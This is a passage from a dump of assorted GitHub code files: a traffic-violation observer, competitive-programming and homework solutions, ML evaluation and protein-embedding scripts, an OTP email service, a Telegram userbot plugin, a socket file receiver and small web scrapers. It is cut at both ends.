fontScale=1,\n                    color=constants.COLOR_BLACK,\n                    thickness=1)\n\n        cv2.putText(img=statistics_panel,\n                    text=f\"Red drivers: {self.red_drivers_count}\",\n                    org=(300, 20),\n                    fontFace=1,\n                    fontScale=1,\n                    color=constants.COLOR_BLACK,\n                    thickness=1)\n\n        cv2.putText(img=statistics_panel,\n                    text=f\"Orange drivers: {self.orange_drivers_count}\",\n                    org=(500, 20),\n                    fontFace=1,\n                    fontScale=1,\n                    color=constants.COLOR_BLACK,\n                    thickness=1)\n\n        return np.concatenate((statistics_panel, image), axis=0)\n\n    def get_statistics(self):\n        \"\"\"\n        Provides serialized statistics in the form of a dictionary.\n\n        :return: 
dictionary of serialized statistics\n        \"\"\"\n\n        return {\n            \"total_cars_count\": self.car_count,\n            \"red_drivers_count\": self.red_drivers_count,\n            \"orange_drivers_count\": self.orange_drivers_count,\n            \"red_drivers\": self.red_riders,\n            \"orange_drivers\": self.orange_riders,\n            \"all_drivers\": self._all_cars\n        }\n\n    def restart(self):\n        \"\"\"\n        Clears all dictionaries containing instances of bounding boxes.\n        \"\"\"\n\n        self._boxes = {}\n        self._red_riders = {}\n        self._orange_riders = {}\n        self._all_cars = {}\n\n\nclass Observer(ThreadedPipeBlock):\n    \"\"\"\n    Observes the scene and combines obtained information about car and light objects.\n    On every step a deepcopy of BBoxRepository is sent to the output PipeBlocks.\n\n    While working in calibration mode it helps with detecting the stop line by examining car behaviour on certain light\n    states.\n    \"\"\"\n\n    def __init__(self, info, output, pipe_id=constants.OBSERVER_ID):\n        \"\"\"\n        :param info: instance of InputInfo\n        :param output: list of output instances of PipeBlock\n        :param pipe_id: unique ID of this PipeBlock subclass\n        \"\"\"\n\n        super().__init__(pipe_id=pipe_id,\n                         output=output,\n                         info=info)\n\n        self._previous_lights_state = None\n        self._bounding_boxes_repository = BBoxRepository()\n\n    def _mode_changed(self, new_mode):\n        \"\"\"\n        When detection mode starts, BBoxRepositories are cleared.\n\n        :param new_mode: new mode\n        \"\"\"\n\n        super()._mode_changed(new_mode)\n\n        if new_mode == Mode.DETECTION:\n            self._bounding_boxes_repository.restart()\n\n    def _step(self, seq):\n        \"\"\"\n        Each step, serialized tracked objects are received from Tracker and\n        light states are received from TrafficLightObserver.\n        For every serialized tracked object a bounding box is updated or inserted using BBoxRepository\n\n        If the current light state has a certain value and the stop line is not found, then the\n        position of the first car in every corridor is used for its approximation.\n\n        :param seq: current sequence number\n        \"\"\"\n\n        tracker_seq, tracked_objects = self.receive(pipe_id=constants.TRACKER_ID)\n        lights_seq, current_lights_state = self.receive(pipe_id=constants.TRAFFIC_LIGHT_OBSERVER_ID)\n\n        for tracked_object in tracked_objects:\n            anchors, _, car_info, car_velocity = tracked_object\n            self._bounding_boxes_repository.insert_or_update(anchors, car_info, car_velocity, current_lights_state, self._info, seq)\n\n        self._bounding_boxes_repository.check_lifetime()\n\n        if self._previous_lights_state in [Color.RED_ORANGE, Color.RED] and current_lights_state == Color.GREEN:\n            if not self._info.corridors_repository.stopline_found:\n                boxes_in_corridors = self._bounding_boxes_repository.get_boxes_in_corridors(info=self._info)\n\n                for corridors in boxes_in_corridors.values():\n                    try:\n                        first_car = corridors[0]\n                        self._info.corridors_repository.add_stop_point(first_car.center_point)\n                    except IndexError:\n                        continue\n\n        if is_frequency(seq, constants.VIDEO_PLAYER_FREQUENCY):\n            message = seq, deepcopy(self._bounding_boxes_repository), current_lights_state\n            self.send(message, pipe_id=constants.VIDEO_PLAYER_ID, block=False)\n\n        if is_frequency(seq, constants.VIOLATION_WRITER_FREQUENCY):\n            message = seq, deepcopy(self._bounding_boxes_repository), current_lights_state\n            self.send(message, pipe_id=constants.VIOLATION_WRITER_ID)\n\n        self._previous_lights_state = 
current_lights_state\n","repo_name":"Karpisek/BP","sub_path":"pipeline/observer.py","file_name":"observer.py","file_ext":"py","file_size_in_byte":18505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"40250564457","text":"\"\"\"\n# Definition for Employee.\nclass Employee:\n    def __init__(self, id: int, importance: int, subordinates: List[int]):\n        self.id = id\n        self.importance = importance\n        self.subordinates = subordinates\n\"\"\"\n\n# List comes from typing; defaultdict and deque need explicit imports\nfrom typing import List\nfrom collections import defaultdict, deque\n\n\nclass Solution:\n    def getImportance(self, employees: List['Employee'], id: int) -> int:\n        graph = defaultdict(list)\n        importanceMap = {}\n        for i in range(len(employees)):\n            importanceMap[employees[i].id] = employees[i].importance\n            for nei in employees[i].subordinates:\n                graph[employees[i].id].append(nei)\n        \n        queue = deque([id])\n        visited = set([id])\n        res = 0\n        while queue:\n            node = queue.popleft()\n            res += importanceMap[node]\n            for nei in graph[node]:\n                if nei not in visited:\n                    # mark as visited when enqueuing so each node is counted only once\n                    visited.add(nei)\n                    queue.append(nei)\n        \n        return res","repo_name":"Naboni/Competitive-Programming","sub_path":"Graph/EmployeeImportance.py","file_name":"EmployeeImportance.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2720849231","text":"from enduro.action import Action\n\n\nclass Controller:\n    def __init__(self, ale):\n        self._ale = ale\n\n    def move(self, action):\n        reward = 0\n        repeat = 4 if action == Action.ACCELERATE else 8\n\n        for i in range(repeat):\n            reward += self._ale.act(action)\n\n        return reward\n","repo_name":"ipab-rad/rl-cw1","sub_path":"enduro/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
+{"seq_id":"73569410294","text":"\"\"\"Corona: Available commands: .ripper <cname>\n\"\"\"\nimport datetime\nfrom telethon import events\nfrom telethon.errors.rpcerrorlist import YouBlockedUserError\nfrom telethon.tl.functions.account import UpdateNotifySettingsRequest\nfrom uniborg.util import admin_cmd\n\n@borg.on(admin_cmd(pattern=\"ripper ?(.*)\"))\nasync def _(event):\n    if event.fwd_from:\n        return \n    input_str = event.pattern_match.group(1)\n    reply_message = await event.get_reply_message()\n    chat = \"@mrhacker_genuine_bot\"\n    await event.edit(\"```Thankyou User Reported @sensible_userbot Ripper Team Will Check This And If user Found So That User Will Be Globally Banned...```\")\n    async with event.client.conversation(chat) as conv:\n        try: \n            response = conv.wait_event(events.NewMessage(incoming=True,from_users=1254445279))\n            await event.client.send_message(chat, \"{}\".format(input_str))\n            response = await response \n        except YouBlockedUserError: \n            await event.reply(\"```Abey (@mrhacker_genuine_bot) Ko Unblock Kar```\")\n            return\n        if response.text.startswith(\"Ripper\"):\n            await event.edit(\"😐**Abe Lode Code Churane Aya Hei kya 😎Bhak bhosdike\")\n        else: \n            await event.delete()\n            await event.client.send_message(event.chat_id, response.message)","repo_name":"hellboi-atul/dArK_pRiNcE","sub_path":"userbot/plugins/ripper.py","file_name":"ripper.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"}
+{"seq_id":"4774739552","text":"import argparse\nimport logging\nimport os\nimport random\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport datasets\nimport torch\nimport transformers\nfrom accelerate import 
Accelerator, DistributedDataParallelKwargs\nfrom data_collator import CustomDataCollator\nfrom datasets import load_from_disk, load_metric\nfrom huggingface_hub import Repository\nfrom longformer import get_attention_injected_model\nfrom model_utils import (\n    copy_proj_layers,\n    pretrained_masked_model_selector,\n    pretrained_model_selector,\n    pretrained_sequence_model_selector,\n)\nfrom models import HierarchicalClassificationModel\nfrom torch.utils.data import DataLoader\nfrom transformers import (\n    AutoConfig,\n    AutoModelForSequenceClassification,\n    AutoTokenizer,\n    DataCollatorWithPadding,\n    set_seed,\n)\nfrom transformers.file_utils import get_full_repo_name\nfrom transformers.utils.versions import require_version\nfrom utils import (\n    MODEL_MAPPING,\n    custom_tokenize,\n    load_args,\n    path_adder,\n    preprocess_function,\n    select_base,\n)\n\nlogger = logging.getLogger(__name__)\n\nrequire_version(\n    \"datasets>=1.8.0\",\n    \"To fix: pip install -r examples/pytorch/text-classification/requirements.txt\",\n)\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser(\n        description=\"Finetune the hierarchical model on a text classification task\"\n    )\n    parser.add_argument(\n        \"--test_file\",\n        type=str,\n        default=None,\n        help=\"A csv or a json file containing the test data.\",\n    )\n    parser.add_argument(\n        # Modified\n        \"--max_seq_length\",\n        type=int,\n        default=None,\n        help=(\n            \"The maximum total input sequence length after tokenization. Sequences longer than this will be truncated,\"\n            \" sequences shorter will be padded if `--pad_to_max_length` is passed.\"\n        ),\n    )\n    parser.add_argument(\n        \"--pad_to_max_length\",\n        action=\"store_true\",\n        help=\"If passed, pad all samples to `max_length`. Otherwise, dynamic padding is used.\",\n    )\n    parser.add_argument(\n        # Modified\n        \"--finetuned_dir\",\n        type=str,\n        help=\"Path to the output directory of finetuning.\",\n        required=True,\n    )\n    parser.add_argument(\n        \"--use_slow_tokenizer\",\n        action=\"store_true\",\n        help=\"If passed, will use a slow tokenizer (not backed by the 🤗 Tokenizers library).\",\n    )\n    parser.add_argument(\n        \"--overwrite_cache\",\n        type=bool,\n        default=False,\n        help=\"Overwrite the cached training and evaluation sets\",\n    )\n    parser.add_argument(\n        \"--per_device_eval_batch_size\",\n        type=int,\n        default=8,\n        help=\"Batch size (per device) for the evaluation dataloader.\",\n    )\n    parser.add_argument(\n        \"--output_dir\", type=str, default=None, help=\"Where to store the final model.\"\n    )\n    parser.add_argument(\n        \"--seed\", type=int, default=None, help=\"A seed for reproducible training.\"\n    )\n    parser.add_argument(\n        \"--push_to_hub\",\n        action=\"store_true\",\n        help=\"Whether or not to push the model to the Hub.\",\n    )\n    parser.add_argument(\n        \"--hub_model_id\",\n        type=str,\n        help=\"The name of the repository to keep in sync with the local `output_dir`.\",\n    )\n    parser.add_argument(\n        \"--hub_token\", type=str, help=\"The token to use to push to the Model Hub.\"\n    )\n    # Modified:\n    parser.add_argument(\n        \"--preprocessing_num_workers\",\n        type=int,\n        default=None,\n        help=\"The number of processes to use for the preprocessing.\",\n    )\n    parser.add_argument(\n        \"--max_document_length\",\n        type=int,\n        default=None,\n        required=True,\n        help=\"The maximum number of sentences each document can have. 
Documents are either truncated or\"\n \"padded if their length is different.\",\n )\n parser.add_argument(\n \"--custom_model\",\n type=str,\n help=\"If a custom model is to be used, the model type has to be specified.\",\n default=None,\n choices=[\"hierarchical\", \"sliding_window\", \"longformer\"],\n )\n args = parser.parse_args()\n\n # Sanity checks\n if args.test_file is None:\n raise ValueError(\"Need testing file.\")\n\n if args.push_to_hub:\n assert (\n args.output_dir is not None\n ), \"Need an `output_dir` to create a repo when `--push_to_hub` is passed.\"\n\n return args\n\n\ndef main():\n # Modified: classification arguments\n args = parse_args()\n\n # TODO: change the logic\n # Argments from pretraining\n if args.custom_model == \"hierarchical\":\n pretrained_args = load_args(\n os.path.join(args.finetuned_dir, \"pretrained_args.json\")\n )\n args.use_sliding_window_tokenization = getattr(\n pretrained_args, \"use_sliding_window_tokenization\", False\n )\n elif args.custom_model == \"sliding_window\":\n args.use_sliding_window_tokenization = True\n finetuned_args = load_args(os.path.join(args.finetuned_dir, \"args.json\"))\n\n # Initialize the accelerator. We will let the accelerator handle device placement for us in this example.\n ddp_kwargs = DistributedDataParallelKwargs(find_unused_parameters=True)\n accelerator = Accelerator(kwargs_handlers=[ddp_kwargs])\n\n # Handle the repository creation\n if accelerator.is_main_process:\n if args.push_to_hub:\n if args.hub_model_id is None:\n repo_name = get_full_repo_name(\n Path(args.output_dir).name, token=args.hub_token\n )\n else:\n repo_name = args.hub_model_id\n repo = Repository(args.output_dir, clone_from=repo_name)\n elif args.output_dir is not None:\n # Modified: output_dir is concatanated with datetime and command line arguments are also saved\n # TODO: refactor\n if args.custom_model == \"hierarchical\":\n inter_path = path_adder(\n pretrained_args, finetuning=True, custom_model=args.custom_model\n )\n else:\n inter_path = path_adder(finetuned_args, finetuning=True)\n inter_path += datetime.now().strftime(\"%Y_%m_%d-%H_%M_%S\")\n args.output_dir = os.path.join(args.output_dir, inter_path)\n os.makedirs(args.output_dir, exist_ok=True)\n\n # Make one log on every process with the configuration for debugging.\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO,\n # Modified\n handlers=[\n logging.FileHandler(os.path.join(args.output_dir, \"loginfo.log\")),\n logging.StreamHandler(),\n ],\n )\n logger.info(accelerator.state)\n\n # Setup logging, we only want one process per machine to log things on the screen.\n # accelerator.is_local_main_process is only True for one process per machine.\n logger.setLevel(\n logging.INFO if accelerator.is_local_main_process else logging.ERROR\n )\n if accelerator.is_local_main_process:\n datasets.utils.logging.set_verbosity_warning()\n transformers.utils.logging.set_verbosity_info()\n else:\n datasets.utils.logging.set_verbosity_error()\n transformers.utils.logging.set_verbosity_error()\n\n # If passed along, set the training seed now.\n if args.seed is not None:\n set_seed(args.seed)\n\n accelerator.wait_for_everyone()\n\n # Modified:\n test_dataset = load_from_disk(args.test_file)\n # Labels\n label_list = test_dataset.unique(\"labels\")\n label_list.sort() # Let's sort it for determinism\n num_labels = len(label_list)\n\n if args.custom_model == \"longformer\":\n tokenizer = 
AutoTokenizer.from_pretrained(\n args.finetuned_dir,\n max_length=args.max_seq_length,\n padding=\"max_length\",\n truncation=True,\n )\n else:\n tokenizer = AutoTokenizer.from_pretrained(args.finetuned_dir, use_fast=True)\n\n if args.custom_model in (\"hierarchical\", \"sliding_window\"):\n model = HierarchicalClassificationModel(\n c_args=finetuned_args,\n args=None if args.custom_model == \"sliding_window\" else pretrained_args,\n tokenizer=tokenizer,\n num_labels=num_labels,\n )\n model.load_state_dict(torch.load(os.path.join(args.finetuned_dir, \"model.pth\")))\n elif args.custom_model == \"longformer\":\n psm = pretrained_sequence_model_selector(select_base(args.finetuned_dir))\n model = get_attention_injected_model(psm)\n model = model.from_pretrained(\n args.finetuned_dir, max_length=args.max_seq_length, num_labels=num_labels\n )\n else:\n config = AutoConfig.from_pretrained(args.finetuned_dir, num_labels=num_labels)\n model = AutoModelForSequenceClassification.from_pretrained(\n args.finetuned_dir,\n config=config,\n )\n\n if args.custom_model in (\"hierarchical\", \"sliding_window\"):\n with accelerator.main_process_first():\n # Modified\n test_dataset = test_dataset.rename_column(\"text\", \"article_1\")\n ARTICLE_NUMBERS = 1\n test_dataset = test_dataset.map(\n custom_tokenize,\n fn_kwargs={\n \"tokenizer\": tokenizer,\n \"args\": args,\n \"article_numbers\": ARTICLE_NUMBERS,\n },\n num_proc=args.preprocessing_num_workers,\n load_from_cache_file=False,\n desc=\"Running tokenizer on dataset\",\n )\n else:\n with accelerator.main_process_first():\n test_dataset = test_dataset.map(\n preprocess_function,\n fn_kwargs={\n \"tokenizer\": tokenizer,\n \"max_seq_length\": args.max_seq_length,\n },\n batched=True,\n num_proc=args.preprocessing_num_workers,\n remove_columns=test_dataset.column_names,\n load_from_cache_file=False,\n desc=\"Running tokenizer on dataset\",\n )\n\n # Modified\n\n # Log a few random samples from the training set:\n for index in random.sample(range(len(test_dataset)), 3):\n logger.info(f\"Sample {index} of the training set: {test_dataset[index]}.\")\n\n if args.custom_model in (\"hierarchical\", \"sliding_window\"):\n ARTICLE_NUMBERS = 1\n data_collator = CustomDataCollator(\n tokenizer=tokenizer,\n max_sentence_len=pretrained_args.max_seq_length\n if args.max_seq_length is None\n else args.max_seq_length,\n max_document_len=pretrained_args.max_document_length\n if args.max_document_length is None\n else args.max_document_length,\n article_numbers=ARTICLE_NUMBERS,\n consider_dcls=True if args.custom_model == \"hierarchical\" else False,\n )\n elif args.custom_model == \"longformer\":\n data_collator = DataCollatorWithPadding(tokenizer, pad_to_multiple_of=512)\n else:\n data_collator = DataCollatorWithPadding(\n tokenizer, pad_to_multiple_of=(8 if accelerator.use_fp16 else None)\n )\n\n test_dataloader = DataLoader(\n test_dataset,\n collate_fn=data_collator,\n batch_size=args.per_device_eval_batch_size,\n )\n\n # Prepare everything with our `accelerator`.\n model, test_dataloader = accelerator.prepare(model, test_dataloader)\n\n # Modified: only accuracy.\n # Get the metric function\n metric = load_metric(\"accuracy\")\n\n model.eval()\n for batch in test_dataloader:\n # Modified for Hierarchical Classification Model\n with torch.no_grad():\n outputs = model(**batch)\n predictions = outputs.logits.argmax(dim=-1)\n metric.add_batch(\n predictions=accelerator.gather(predictions),\n references=accelerator.gather(batch[\"labels\"]),\n )\n\n eval_metric = 
metric.compute()\n    logger.info(f\"final accuracy: {eval_metric}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"ogaloglu/pre-training-multilingual-document-encoders","sub_path":"src/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":12234,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
+{"seq_id":"74666906931","text":"import torch\nimport esm\nimport numpy as np\nimport argparse\nimport sys\nimport os\n\n#Yuzhen Ye, Indiana University, Nov 2023\n\nbatchsize = 1\n\ndef readfasta(filename):\n    seqid, seqseq = [], []\n    inf = open(filename, \"r\")\n    for aline in inf:\n        if aline[0] == '>':\n            if len(seqid) == batchsize:\n                yield seqid, seqseq\n                seqid, seqseq = [], []\n            seqid.append(aline[1:-1])\n            seqseq.append(\"\")\n        else:\n            seqseq[-1] += aline.strip()\n    yield seqid, seqseq\n    inf.close()\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--input\", help=\"FASTA file\", required=True)\n    parser.add_argument(\"--npy\", help=\"save embeddings and contact to files under the given folder (one for each protein)\", required=True)\n    parser.add_argument(\"--gpu\", help=\"using gpu, otherwise using cpu\", required=False)\n    parser.add_argument(\"--batchsize\", help=\"batchsize; default 1\", required=False)\n    parser.add_argument(\"--overwrite\", help=\"redo if npy exists; otherwise skip if exists\", type=bool, default=False, required=False)\n    args = parser.parse_args()\n\n    if not os.path.exists(args.npy):\n        os.mkdir(args.npy) \n\n    if args.batchsize:\n        # update the module-level batchsize used by readfasta() and coerce it to int\n        global batchsize\n        batchsize = int(args.batchsize)\n\n    print(\"load model...\")\n    torch.cuda.empty_cache()\n    device = torch.device('cuda:0' if torch.cuda.is_available() and args.gpu else 'cpu')\n\n    # Load ESM-2 model\n    model, alphabet = esm.pretrained.esm2_t33_650M_UR50D()\n    batch_converter = alphabet.get_batch_converter()\n    model.eval() # disables dropout for deterministic results\n\n    if args.gpu:\n        model.to('cuda')\n\n    fasta = readfasta(args.input) \n    while True:\n        try:\n            seqid, seqseq = next(fasta)\n        except:\n            break\n        data = []\n        for idx in range(len(seqid)):\n            filen = args.npy + \"/\" + seqid[idx] + \".npz\"\n            if (not args.overwrite) and os.path.exists(filen):\n                print(f\"seq {seqid[idx]} already exists\")\n                continue\n            if len(seqseq[idx]) > 6000:\n                print(f\"seq {seqid[idx]} too long {len(seqseq[idx])}\")\n                continue\n            print(f\"seq {seqid[idx]} {len(seqseq[idx])}\")\n            data.append((seqid[idx], seqseq[idx]))\n        # skip empty batches before calling the batch converter\n        if len(data) == 0:\n            continue\n        batch_labels, batch_strs, batch_tokens = batch_converter(data)\n        batch_lens = (batch_tokens != alphabet.padding_idx).sum(1)\n        # Extract per-residue representations (on CPU)\n        #batch_tokens = batch_tokens.to('cuda')\n        with torch.no_grad():\n            results = model(batch_tokens, repr_layers=[13, 25, 33], return_contacts=True)\n        r33a = results[\"representations\"][33]\n        r13a = results[\"representations\"][13]\n        r25a = results[\"representations\"][25]\n        cta = results[\"contacts\"]\n\n        np.set_printoptions(threshold=sys.maxsize)\n        emblist = []\n        for (sid, seq), tokens_len, e13, e25, e33, ct in zip(data, batch_lens, r13a, r25a, r33a, cta):\n            a = ct.numpy().flatten()\n            filen = args.npy + \"/\" + sid\n            np.savez_compressed(filen, s=seq, e13=e13, e25=e25, e33=e33, ct=ct)\nif __name__ == \"__main__\":\n    main()\n","repo_name":"mgtools/DCTdomain","sub_path":"src/embed-mult.py","file_name":"embed-mult.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"39188167963","text":"from argon2 import PasswordHasher\nfrom argon2.exceptions import VerifyMismatchError\nfrom flask import render_template\nfrom flask_mail import Message\nimport random\nfrom dataclasses import asdict\n\nfrom src.application.dto.email_dto import CheckEmailInputDto, EmailCountDto, UserLock\nfrom src.domain.entities.email_entity import ArgonEntity\nfrom src.domain.value.otp import emailTemplate, emailTitle, emailBody, emailSender\nfrom src.domain.value.collection import usersCol, otpCol\nfrom src.domain.value.filed import lockStatusFiled\nfrom src.domain.value.exceptions import LockedUser, VerifyOTP\n\n\nclass EmailDomainService:\n def __init__(self, argon_entity: ArgonEntity):\n self._argon_entity = argon_entity\n\n def create_crypt_num(self, argon_entity: ArgonEntity):\n memory_cost = argon_entity.memoryCostLow << argon_entity.memoryCostHigh\n otp = random.randint(argon_entity.randomLow, argon_entity.randomHigh)\n hasher = PasswordHasher(argon_entity.timeCost, memory_cost, argon_entity.parallelism)\n str_otp = str(otp)\n crypt_otp = hasher.hash(str_otp)\n return otp, crypt_otp, hasher\n\n async def create_template(self, user_email):\n otp, hash_otp, _ = self.create_crypt_num(self._argon_entity)\n html_template = render_template(emailTemplate, OTP=otp)\n\n email_msg = Message(emailTitle, sender=emailSender, recipients=[user_email])\n email_msg.body = emailBody\n email_msg.html = html_template\n return otp, hash_otp, email_msg\n\n def check_user_status(self, email_repo, false_count, uid):\n count_params = EmailCountDto(false_count + 1)\n status_params = UserLock(lockStatusFiled)\n\n if false_count >= 5:\n email_repo.update_user_status(asdict(status_params))\n raise LockedUser\n email_repo.update_false_count(asdict(count_params))\n raise VerifyOTP\n\n def check_otp(self, email_input: CheckEmailInputDto):\n user_status = email_input.user_status\n crypto_otp = email_input.crypto_otp\n req_otp = email_input.req_otp\n false_count = email_input.false_count\n uid = email_input.uid\n email_repo = email_input.repo\n _, _, hasher = self.create_crypt_num(self._argon_entity)\n \n if user_status == lockStatusFiled:\n raise LockedUser\n try:\n hasher.verify(crypto_otp, req_otp)\n return 'correct'\n except:\n self.check_user_status(email_repo, false_count, uid)","repo_name":"mo-zza/application_api","sub_path":"src/domain/services/email_domain_service.py","file_name":"email_domain_service.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42797991855","text":"casa = input('Quanto custa a casa? ')\nsalario = input('Qual o seu salário? ')\nanos = input('Em quantos anos vai pagar? 
')\n\n# input() returns strings, so convert them to numbers before doing arithmetic\ncasa = float(casa)\nsalario = float(salario)\nanos = int(anos)\n\nprestacao = casa/(anos*12)\n\nif prestacao > salario * 0.3:\n    print ('Empréstimo não aprovado')\nelse:\n    print ('Empréstimo aprovado')\n    ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_179/ch26_2020_03_24_19_53_43_324171.py","file_name":"ch26_2020_03_24_19_53_43_324171.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73609802613","text":"# -*- coding: utf-8 -*-\nfrom unittest import mock\n\nimport pytest\n\nfrom YouPy import YouTubeItem\nfrom YouPy.exceptions import VideoUnavailable\n\n\n@mock.patch(\"YouPy.youtube_item.YouTubeItem\")\ndef test_prefetch_deferred(youtube_item):\n    instance = youtube_item.return_value\n    instance.prefetch_descramble.return_value = None\n    YouTubeItem(\"https://www.youtube.com/watch?v=9bZkp7q19f0\", True)\n    assert not instance.prefetch_descramble.called\n\n\n@mock.patch(\"urllib.request.install_opener\")\ndef test_install_proxy(opener):\n    proxies = {\"http\": \"http://www.example.com:3128/\"}\n    YouTubeItem(\n        \"https://www.youtube.com/watch?v=9bZkp7q19f0\",\n        defer_prefetch_init=True,\n        proxies=proxies,\n    )\n    opener.assert_called()\n\n\n@mock.patch(\"YouPy.request.get\")\ndef test_video_unavailable(get):\n    get.return_value = None\n    youtube_item = YouTubeItem(\n        \"https://www.youtube.com/watch?v=9bZkp7q19f0\", defer_prefetch_init=True\n    )\n    with pytest.raises(VideoUnavailable):\n        youtube_item.prefetch()\n","repo_name":"kazanture/YouPy","sub_path":"tests/test_youtube_item.py","file_name":"test_youtube_item.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"27952306872","text":"from .base import Generator\n\n\nclass Select(Generator):\n\n    def get_arguments(self, table=None, where=None, pk='id', **kwargs):\n        super().get_arguments(**kwargs)\n\n        self.table = table\n        self.where = self.parse_vars(where)\n        self.pk = pk\n\n    def generate(self):\n        backend = self.blueprint.backend\n\n        while True:\n            where = self.evaluate(self.where)\n            values = backend.select_random(self.table, fields=(self.pk,),\n                                           where=where, max_rows=10000)\n            for value in values:\n                if self.evaluate(self.where) != where:\n                    break\n                yield value\n","repo_name":"peopledoc/populous","sub_path":"populous/generators/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"}
+{"seq_id":"11113837534","text":"#!/usr/bin/python3\n\"\"\"\nSends a request to a URL and displays the value of the X-Request-Id variable\n\"\"\"\n\nimport urllib.request\nimport sys\n\nif __name__ == \"__main__\":\n    url = sys.argv[1]\n    with urllib.request.urlopen(url) as response:\n        headers = response.headers\n\n    x_request_id = headers.get('X-Request-Id')\n    print(x_request_id)\n","repo_name":"EJmpa/alx-higher_level_programming","sub_path":"0x11-python-network_1/1-hbtn_header.py","file_name":"1-hbtn_header.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"23509257999","text":"import os\nimport requests\n\ndef content() :\n    os.system('clear')\n    print(\"Welcome to IsItDown.py!\")\n    url = input(\"Please write a URL or URLs you want to check. 
(separated by comma)\\n\")\n split_url = url.split(\",\")\n s_url = []\n for each_url in split_url:\n replace_url = each_url.replace(\" \", \"\")\n s_url.append(replace_url)\n\n for st_url in s_url :\n lower_url = st_url.lower()\n if \".com\" not in lower_url:\n print(f\"{lower_url} is not a valid syntax!\")\n else :\n if lower_url.startswith(\"http://\"):\n try :\n result = requests.get(lower_url)\n print(f\"{lower_url} is up!\")\n except : \n print(f\"{lower_url} is down!\")\n else :\n ori_url = \"http://\" + lower_url\n try :\n result = requests.get(ori_url)\n print(f\"{ori_url} is up!\")\n except : \n print(f\"{ori_url} is down!\")\n\ndef answer():\n ans = input(\"Do you want to start over? : \")\n up_ans = ans.upper()\n if up_ans == 'Y' or up_ans == 'YES' :\n content()\n elif up_ans == 'N' or up_ans == 'NO':\n print(\"k, bye!\")\n else :\n print(\"That's not a valid answer\")\n answer()\n\ncontent()\nanswer()\n \n","repo_name":"nitronium102/python-scrapper","sub_path":"day4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20833243484","text":"#-*-coding:utf-8-*-\n#/usr/bin/env python\n__author__ = \"Allan\"\nimport socket\n\nsk = socket.socket()\nsk.bind(('127.0.0.1',9999,))\nsk.listen(5)\n\nwhile True:\n conn,access = sk.accept()\n conn.sendall(bytes(\"Welcome\",encoding='utf-8'))\n file_size = str(conn.recv(1024),encoding='utf-8')\n conn.sendall(bytes(\"Received\",encoding='utf-8'))\n\n total_size = int(file_size)\n has_recv = 0\n f = open('new.jpg','wb')\n while True:\n if total_size ==has_recv:\n break\n data = conn.recv(1024)\n f.write(data)\n has_recv += len(data)\n\n f.close()","repo_name":"nurruden/training","sub_path":"day10/socket_file/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21236280630","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nwebsite = requests.get('https://quotes.toscrape.com/')\nsoup = BeautifulSoup(website.text, 'html.parser')\n\ntitle = soup.select_one('title').text\n# print(title)\n\nlink = soup.find(href = '/login').text\n# print(link)\n\nlinks = soup.find_all('a')\n# print(links)\n\n# for link in links:\n # print(link.text)\n\nquote = soup.find(class_ = 'text').text\n# print(quote)\n\nquotes = soup.find_all(class_ = 'text')\n\n# for quote in quotes:\n # print(quote.text)\n\nauthor = soup.find(class_ = 'author').text\n# print(author)\n\nauthors = soup.find_all(class_ = 'author')\n\n# for author in authors:\n# print(author.text)\n\n######################################################################\n'''\nquote = soup.select('.quote')\nfor item in quote:\n quotes = item.select_one('.text')\n authors = item.select_one('.author')\n tags = item.select('.tags')\n print(quotes.text)\n print(authors.text)\n for tag in tags:\n print(tag.text)\n print('======================================================')\n'''\n\n# next_button = soup.select_one('.next')\n# print(next_button.text)\n\nnext_button = True\npage = 1\nwhile(next_button):\n website = requests.get('https://quotes.toscrape.com/page/' + str(page))\n soup = BeautifulSoup(website.text, 'html.parser')\n next_button = soup.select_one('.next')\n quotes = soup.select('.quote')\n print(f'page: {page}')\n for quote in quotes:\n text = quote.select_one('.text')\n author = quote.select_one('.author')\n tags = 
